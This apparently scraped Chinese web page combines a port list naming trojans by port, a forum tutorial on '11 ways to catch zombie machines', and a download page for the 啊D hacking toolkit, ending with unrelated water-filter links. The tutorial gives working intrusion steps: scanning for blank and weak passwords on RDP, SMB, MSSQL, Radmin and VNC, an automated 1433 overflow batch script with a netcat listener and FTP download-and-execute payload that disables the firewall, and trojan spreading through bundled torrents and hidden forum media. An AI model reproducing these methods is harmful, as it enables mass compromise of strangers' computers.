服务:Macintosh,File Services(AFP/IP)
说明:Macintosh,文件服务。

端口:553
服务:CORBA IIOP (UDP)
说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口:555
服务:DSF
说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

端口:568
服务:Membership DPA
说明:成员资格 DPA。

端口:569
服务:Membership MSN
说明:成员资格 MSN。

端口:635
服务:mountd
说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。

端口:636
服务:LDAP
说明:SSL(Secure Sockets layer)

端口:666
服务:Doom Id Software
说明:木马Attack FTP、Satanz Backdoor开放此端口

端口:993
服务:IMAP
说明:SSL(Secure Sockets layer)

端口:1001、1011
服务:[NULL]
说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

端口:1024
服务:Reserved
说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。

端口:1025、1033
服务:1025:network blackjack 1033:[NULL]
说明:木马netspy开放这2个端口。

端口:1080
服务:SOCKS
说明:这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置,它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误,在加入IRC聊天室时常会看到这种情况。

端口:1170
服务:[NULL]
说明:木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。

端口:1234、1243、6711、6776
服务:[NULL]
说明:木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

端口:1245
服务:[NULL]
说明:木马Vodoo开放此端口。

端口:1433
服务:SQL
说明:Microsoft的SQL服务开放的端口。

端口:1492
服务:stone-design-1
说明:木马FTP99CMP开放此端口。

端口:1500
服务:RPC client fixed port session queries
说明:RPC客户固定端口会话查询

端口:1503
服务:NetMeeting T.120
说明:NetMeeting T.120

端口:1524
服务:ingress
说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。

端口:1600
服务:issd
说明:木马Shivka-Burka开放此端口。

端口:1720
服务:NetMeeting
说明:NetMeeting H.233 call Setup。

端口:1731
服务:NetMeeting Audio Call Control
说明:NetMeeting音频调用控制。

端口:1807
服务:[NULL]
说明:木马SpySender开放此端口。

端口:1981
服务:[NULL]
说明:木马ShockRave开放此端口。

端口:1999
服务:cisco identification port
说明:木马BackDoor开放此端口。

端口:2000
服务:[NULL]
说明:木马GirlFriend 1.3、Millenium 1.0开放此端口。

端口:2001
服务:[NULL]
说明:木马Millenium 1.0、Trojan Cow开放此端口。

端口:2023
服务:xinuexpansion 4
说明:木马Pass Ripper开放此端口。

端口:2049
服务:NFS
说明:NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。

端口:2115
服务:[NULL]
说明:木马Bugs开放此端口。

端口:2140、3150
服务:[NULL]
说明:木马Deep Throat 1.0/3.0开放此端口。

端口:2500
服务:RPC client using a fixed port session replication
说明:应用固定端口会话复制的RPC客户

9. 怎么学抓肉鸡

抓肉鸡的11种方法
首先得准备,免杀的STAT 或 一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)
(1)
扫3389端口抓肉鸡
(适合新手)(抓不了国外肉鸡)
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
(2)
扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)
(3)
扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
(4)
1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡
要用到的工具:S扫 sqlhello.exe nc.exe批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556<nc.txt&&%0 这里的556要和上面的保持一致,你也可以改成其他的值,但是2处都要改,然后保存为nc.bat
然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。
这里给出一种代码
echo open X.X.X.X(你FTP的IP)>>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
上面的步骤都搞好后,就可以开始扫肉鸡了。
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。
忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。
先休息一下,打这么多字累死了
继续
(5)
扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scanSQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。
(6)
用WINNTAutoAttack扫SA弱口令抓肉鸡
工具:WINNTAutoAttack SQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。
(7)
扫4899空口令抓肉鸡
工具:端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899
(8)
扫5900端口抓VNC肉鸡
工具:VNC扫描器 VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。
(9)
BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。
(10)
免费空间挂马
其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的
(11)
用RM在论坛挂马
首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性 ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。

10. 急求阿D工具包

我的这个是在阿D博客上面下的 ,
http://www.d99net.net/ 里面全是啊D的软件,保证没有捆绑任何木马!!

本软件不会收费,将一直免费下去!

老早前修改过一些地方,现在忘了修改过什么地方了,基本上和2.01差不多!关闭进程的能力加强了!

软件功能如下:
---------------------------------------------------------------------------------
1. 共享资源查找 [为你查找网上的共享资源!]
2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便]
3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]
4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]
5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]
6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]
3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]
3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]
4. 端口扫描 [使你更加了解对方主机端口的打开状况]
5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]
6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]
8. Ping [判断某IP是否和网络连接的好帮手!]
9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]
10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]
11. Finger [Finger能为你查询对方系统的用户信息!]
12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]
13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]
14. 常用修改 [反恶意网页修改,恢复系统设置等]
19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]
---------------------------------------------------------------------------------

支持的系统:win98/WinMe/win2000/WinXP/WinNT

下载:http://www.xpfox.net/DTools2.02.rar

请注意,啊D网络工具包,已被列入杀毒软件的病毒库,所以如果你开了杀毒软件的话,可能不能用我的软件! 怀疑有毒或是不放心的朋友,请不要下载软件!

常见问题
------------------------------------------------------------------------------------------
扫不出肉鸡有很多的可能!一般有如下的情况!
1.你系统的防火墙,或某些补丁作怪!
2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道)
3.机子设置有关!
4.扫描的网段没有肉鸡(空IPC的2000机子,其实现在已比较少的了)
5.XP扫描肉鸡,是比较难扫到肉鸡的(2000和XP的IPC扫描有所不同,软件中是利用系统自带的IPC验证功能,至于XP系统的IPC扫描为什么会比较难,是和系统有关)
6.有些路由作了扫描限制
7,需要的服务没开启,请开启他,Workstation,Server

阅读全文

与啊d过滤11相关的资料

热点内容
中空纤维超滤什么意思 浏览:877
纯水机的ph值多少为合格 浏览:963
过滤槽隔板间距 浏览:876
污水处理厂出厂污泥 浏览:992
超滤膜怎么做的 浏览:937
雷沃空气滤芯多少钱 浏览:20
费森尤斯血液透析机超滤失败 浏览:628
卷式反渗透膜反冲洗示意图 浏览:649
净水器分贝标准是多少 浏览:693
环氧树脂钢筋 浏览:901
奥迪q5空调滤芯什么样子 浏览:186
蒸馏中q值增大 浏览:992
污水处理液碱如何配比 浏览:665
切割机滤芯多少钱 浏览:959
贵州赫章污水处理厂 浏览:195
反渗透纯水的电导率一般多少 浏览:391
如何提取污水中的盐酸 浏览:102
温州小吃店污水管网施工怎么接 浏览:607
不锈钢去除水垢秘绝 浏览:236
污水ss是什么沉降比不 浏览:860